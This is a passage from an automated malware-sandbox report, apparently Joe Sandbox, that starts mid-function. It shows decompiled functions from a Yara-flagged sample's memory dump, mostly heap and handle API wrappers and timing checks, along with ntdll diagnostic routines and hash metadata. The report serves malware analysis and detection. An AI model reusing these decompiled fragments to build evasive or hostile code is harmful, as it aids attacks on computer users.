				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF70(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                        0x0041a4a3
                                                        0x0041a4a6
                                                        0x0041a4af
                                                        0x0041a4b7
                                                        0x0041a4c5
                                                        0x0041a4c9

                                                        APIs
                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4C5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction ID: c33b16737f5c434921732b7844560f19735d13db32535ac4bb7687e6ea559cfd
                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction Fuzzy Hash: 04D01776200214ABD710EBD9CC85EE77BACEF48764F154499BA189B242C530FA1086E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A49C Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 112 41a49c-41a4c9 call 41af70 NtClose
                                                        C-Code - Quality: 82%
                                                        			E0041A49C(void* __eax, intOrPtr _a4, void* _a8) {
				long _t10;
				void* _t13;

				asm("in eax, dx");
				_t7 = _a4;
				_t2 = _t7 + 0x10; // 0x300
				_t3 = _t7 + 0xc50; // 0x40a943
				E0041AF70(_t13, _a4, _t3,  *_t2, 0, 0x2c);
				_t10 = NtClose(_a8); // executed
				return _t10;
			}





                                                        0x0041a49e
                                                        0x0041a4a3
                                                        0x0041a4a6
                                                        0x0041a4af
                                                        0x0041a4b7
                                                        0x0041a4c5
                                                        0x0041a4c9

                                                        APIs
                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4C5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: bda98e7e765b9442b5a9279a4d0ed0fca0bf41d6faac94aadb139973c5bb719c
                                                        • Instruction ID: 0e45f592b5f4b4a9e32a28aef072a541f7abe52b2299f0f74ea8799ce7f565bb
                                                        • Opcode Fuzzy Hash: bda98e7e765b9442b5a9279a4d0ed0fca0bf41d6faac94aadb139973c5bb719c
                                                        • Instruction Fuzzy Hash: 4CD02BAD40D2C04BC710EAF464C14C37B81DE512183244D8EE4D847207C128D21A9291
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 121 1829860-182986c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: daa07ec57ce92b5500cacea640df5d1593bd5e3731b97ac28c78dd076e6a527b
                                                        • Instruction ID: 2c731a6ca3a0e688ba35da5913310bc6760efd02f231eabf1c0357b8ce5a7c18
                                                        • Opcode Fuzzy Hash: daa07ec57ce92b5500cacea640df5d1593bd5e3731b97ac28c78dd076e6a527b
                                                        • Instruction Fuzzy Hash: 8090027121100413D111619945047070009A7D0382FD5C512A1418668DD6968A67B1A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018296E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 120 18296e0-18296ec LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 1f197121da4d108df291e7556301ca05646107dcbbbb49ef3e90a018c63acf8b
                                                        • Instruction ID: b7229ba913c766ca75bed3f7d9d170450b8fcbf240b419e84b2217148a37172c
                                                        • Opcode Fuzzy Hash: 1f197121da4d108df291e7556301ca05646107dcbbbb49ef3e90a018c63acf8b
                                                        • Instruction Fuzzy Hash: 6790027121108802D1106199840474A0005A7D0342F99C511A5418768DC6D589A671A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 119 1829660-182966c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: cdfe5c9480e6e120763604fd09d5968447d526e1b64ba7054748d957fdfcd687
                                                        • Instruction ID: 06dd1eeeb728f1f7d37d29279727990266f380503fc4e9c212bf151b648323e3
                                                        • Opcode Fuzzy Hash: cdfe5c9480e6e120763604fd09d5968447d526e1b64ba7054748d957fdfcd687
                                                        • Instruction Fuzzy Hash: E590027121100802D1807199440464A0005A7D1342FD5C115A1019764DCA558B6E77E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E00409AB0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t2 =  &_v24; // 0x8b55b27f
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52, _t2); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE30( &_v284, 0x104);
						_t47 =  &_v284;
						E0041C4A0( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(_t47, E00414D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                        0x00409abb
                                                        0x00409abe
                                                        0x00409ac3
                                                        0x00409ac5
                                                        0x00409aca
                                                        0x00409acf
                                                        0x00409ae2
                                                        0x00409ae7
                                                        0x00409af0
                                                        0x00409afc
                                                        0x00409b08
                                                        0x00409b0f
                                                        0x00409b14
                                                        0x00409b17
                                                        0x00409b20
                                                        0x00409b32
                                                        0x00409b37
                                                        0x00409b3c
                                                        0x00000000
                                                        0x00000000
                                                        0x00409b3e
                                                        0x00409b42
                                                        0x00000000
                                                        0x00000000
                                                        0x00409b44
                                                        0x00000000
                                                        0x00409b42
                                                        0x00409b46
                                                        0x00409b49
                                                        0x00409b4f
                                                        0x00409b51
                                                        0x00409b5c
                                                        0x00409b61
                                                        0x00409b64
                                                        0x00409b71
                                                        0x00409b7c
                                                        0x00409b7e
                                                        0x00409b84
                                                        0x00409b88
                                                        0x00409b8b
                                                        0x00409b8b
                                                        0x00409b92
                                                        0x00409b95
                                                        0x00409b9a
                                                        0x00409ba7
                                                        0x00409ad6
                                                        0x00409ad6
                                                        0x00409ad6

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d2c56eb8839fe751382d3ed7451ab415c40210c8f77f6249a84ada126e88df99
                                                        • Instruction ID: 59e6146db33f4cde1181012f6319e9085256b3a86d69d0266e6165f22895f17e
                                                        • Opcode Fuzzy Hash: d2c56eb8839fe751382d3ed7451ab415c40210c8f77f6249a84ada126e88df99
                                                        • Instruction Fuzzy Hash: 2B210AB2D4020857CB25DA64AD52BFF73BCAB54314F44007FE949A3182F638BE498BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 6 41a640-41a671 call 41af70 RtlAllocateHeap
                                                        C-Code - Quality: 100%
                                                        			E0041A640(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF70(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                        0x0041a657
                                                        0x0041a662
                                                        0x0041a66d
                                                        0x0041a671

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A66D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: 6EA
                                                        • API String ID: 1279760036-1400015478
                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction ID: 592b11653d41df1d8c7fc10f01e82977d3d632a9db32d8feb401f664a84ee6f2
                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction Fuzzy Hash: 34E012B5200208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F9118AB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A673 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 103 41a673-41a697 call 41af70 105 41a69c-41a6b1 RtlFreeHeap 103->105
                                                        C-Code - Quality: 68%
                                                        			E0041A673(void* __eax, void* __edi, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t17;

				asm("aas");
				asm("pushfd");
				 *(__edi + 0x58) =  *(__edi + 0x58) << 1;
				_t14 = _v0;
				_t7 = _t14 + 0xc74; // 0xc74
				E0041AF70(__edi, _v0, _t7,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t17 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t17;
			}





                                                        0x0041a673
                                                        0x0041a676
                                                        0x0041a678
                                                        0x0041a683
                                                        0x0041a68f
                                                        0x0041a697
                                                        0x0041a6ad
                                                        0x0041a6b1

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A6AD
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: 77b2eeb3d79cb32335833725ec47d385811f650ff39fbdb9feac8615ad5f0ee8
                                                        • Instruction ID: b2184071c80a664501a0a6037332ba82b29dc6c4a11714587f914013b17e54d4
                                                        • Opcode Fuzzy Hash: 77b2eeb3d79cb32335833725ec47d385811f650ff39fbdb9feac8615ad5f0ee8
                                                        • Instruction Fuzzy Hash: D3E06DB12046017FD714DF68CC48EE73B6AEF84390F004659F90997292C231E921CAA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A680 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 106 41a680-41a696 107 41a69c-41a6b1 RtlFreeHeap 106->107 108 41a697 call 41af70 106->108 108->107
                                                        C-Code - Quality: 100%
                                                        			E0041A680(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF70(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                        0x0041a68f
                                                        0x0041a697
                                                        0x0041a6ad
                                                        0x0041a6b1

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A6AD
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                        • Instruction ID: fcee721cd7445a9ad64dbfb52f2376cb99f5489ae25ce6a6cb2d596bcbca8a62
                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                        • Instruction Fuzzy Hash: 9FE046B5200208ABDB18EF99CC49EE777ACEF88764F018559FE085B252C630F910CAF0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0182967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 115 182967a-182967f 116 1829681-1829688 115->116 117 182968f-1829696 LdrInitializeThunk 115->117
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: da0603e2eb0de65c383044cf93964413067b37f1750172528046191bf91115af
                                                        • Instruction ID: 77b624dd11db2926840d1443cf6530b3007ed8ddd453c1a09ba5f96ff48cfe1d
                                                        • Opcode Fuzzy Hash: da0603e2eb0de65c383044cf93964413067b37f1750172528046191bf91115af
                                                        • Instruction Fuzzy Hash: 85B09B71D014D5C9D612D7A44608717794077D0745F57C161D2024751B4778C1D5F5F5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 0189B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Strings
                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0189B314
                                                        • write to, xrefs: 0189B4A6
                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0189B2F3
                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0189B476
                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0189B484
                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0189B53F
                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0189B39B
                                                        • The resource is owned shared by %d threads, xrefs: 0189B37E
                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0189B305
                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0189B352
                                                        • Go determine why that thread has not released the critical section., xrefs: 0189B3C5
                                                        • *** Inpage error in %ws:%s, xrefs: 0189B418
                                                        • *** enter .exr %p for the exception record, xrefs: 0189B4F1
                                                        • <unknown>, xrefs: 0189B27E, 0189B2D1, 0189B350, 0189B399, 0189B417, 0189B48E
                                                        • a NULL pointer, xrefs: 0189B4E0
                                                        • The resource is owned exclusively by thread %p, xrefs: 0189B374
                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0189B38F
                                                        • The instruction at %p tried to %s , xrefs: 0189B4B6
                                                        • *** then kb to get the faulting stack, xrefs: 0189B51C
                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0189B323
                                                        • The critical section is owned by thread %p., xrefs: 0189B3B9
                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0189B48F
                                                        • an invalid address, %p, xrefs: 0189B4CF
                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0189B2DC
                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0189B3D6
                                                        • The instruction at %p referenced memory at %p., xrefs: 0189B432
                                                        • This failed because of error %Ix., xrefs: 0189B446
                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0189B47D
                                                        • *** enter .cxr %p for the context, xrefs: 0189B50D
                                                        • read from, xrefs: 0189B4AD, 0189B4B2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                        • API String ID: 0-108210295
                                                        • Opcode ID: 9810250657eaab38704e5db695a9c821ae715496c5b8832ab8e88a222290af52
                                                        • Instruction ID: fc9096970c35ac193ed0a89c0fec8fac3c1f2760e9052662b353654d5e9fbcd5
                                                        • Opcode Fuzzy Hash: 9810250657eaab38704e5db695a9c821ae715496c5b8832ab8e88a222290af52
                                                        • Instruction Fuzzy Hash: AA8147B1A40204FFDF229A4AEC95D7BBF75EF56B96F080048F5049B152D261C681D7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018A1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 44%
                                                        			E018A1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x17c48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017EB150();
				} else {
					E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x18d589c);
				E017EB150("Heap error detected at %p (heap handle %p)\n",  *0x18d58a0);
				_t27 =  *0x18d5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M018A1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017EB150();
				} else {
					E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E017EB150("Error code: %d - %s\n",  *0x18d5898);
				_t113 =  *0x18d58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017EB150();
					} else {
						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017EB150("Parameter1: %p\n",  *0x18d58a4);
				}
				_t115 =  *0x18d58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017EB150();
					} else {
						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017EB150("Parameter2: %p\n",  *0x18d58a8);
				}
				_t117 =  *0x18d58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017EB150();
					} else {
						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017EB150("Parameter3: %p\n",  *0x18d58ac);
				}
				_t119 =  *0x18d58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017EB150();
					} else {
						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x18d58b4);
					E017EB150("Last known valid blocks: before - %p, after - %p\n",  *0x18d58b0);
				} else {
					_t120 =  *0x18d58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017EB150();
				} else {
					E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E017EB150("Stack trace available at %p\n", 0x18d58c0);
			}











                                                        0x018a1c10
                                                        0x018a1c16
                                                        0x018a1c1e
                                                        0x018a1c3d
                                                        0x018a1c3e
                                                        0x018a1c20
                                                        0x018a1c35
                                                        0x018a1c3a
                                                        0x018a1c44
                                                        0x018a1c55
                                                        0x018a1c5a
                                                        0x018a1c65
                                                        0x018a1c67
                                                        0x00000000
                                                        0x018a1c6e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x018a1c67
                                                        0x018a1cdc
                                                        0x018a1ce5
                                                        0x018a1d04
                                                        0x018a1d05
                                                        0x018a1ce7
                                                        0x018a1cfc
                                                        0x018a1d01
                                                        0x018a1d0b
                                                        0x018a1d17
                                                        0x018a1d1f
                                                        0x018a1d25
                                                        0x018a1d30
                                                        0x018a1d4f
                                                        0x018a1d50
                                                        0x018a1d32
                                                        0x018a1d47
                                                        0x018a1d4c
                                                        0x018a1d61
                                                        0x018a1d67
                                                        0x018a1d68
                                                        0x018a1d6e
                                                        0x018a1d79
                                                        0x018a1d98
                                                        0x018a1d99
                                                        0x018a1d7b
                                                        0x018a1d90
                                                        0x018a1d95
                                                        0x018a1daa
                                                        0x018a1db0
                                                        0x018a1db1
                                                        0x018a1db7
                                                        0x018a1dc2
                                                        0x018a1de1
                                                        0x018a1de2
                                                        0x018a1dc4
                                                        0x018a1dd9
                                                        0x018a1dde
                                                        0x018a1df3
                                                        0x018a1df9
                                                        0x018a1dfa
                                                        0x018a1e00
                                                        0x018a1e0a
                                                        0x018a1e13
                                                        0x018a1e32
                                                        0x018a1e33
                                                        0x018a1e15
                                                        0x018a1e2a
                                                        0x018a1e2f
                                                        0x018a1e39
                                                        0x018a1e4a
                                                        0x018a1e02
                                                        0x018a1e02
                                                        0x018a1e08
                                                        0x00000000
                                                        0x00000000
                                                        0x018a1e08
                                                        0x018a1e5b
                                                        0x018a1e7a
                                                        0x018a1e7b
                                                        0x018a1e5d
                                                        0x018a1e72
                                                        0x018a1e77
                                                        0x018a1e95

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                        • API String ID: 0-2897834094
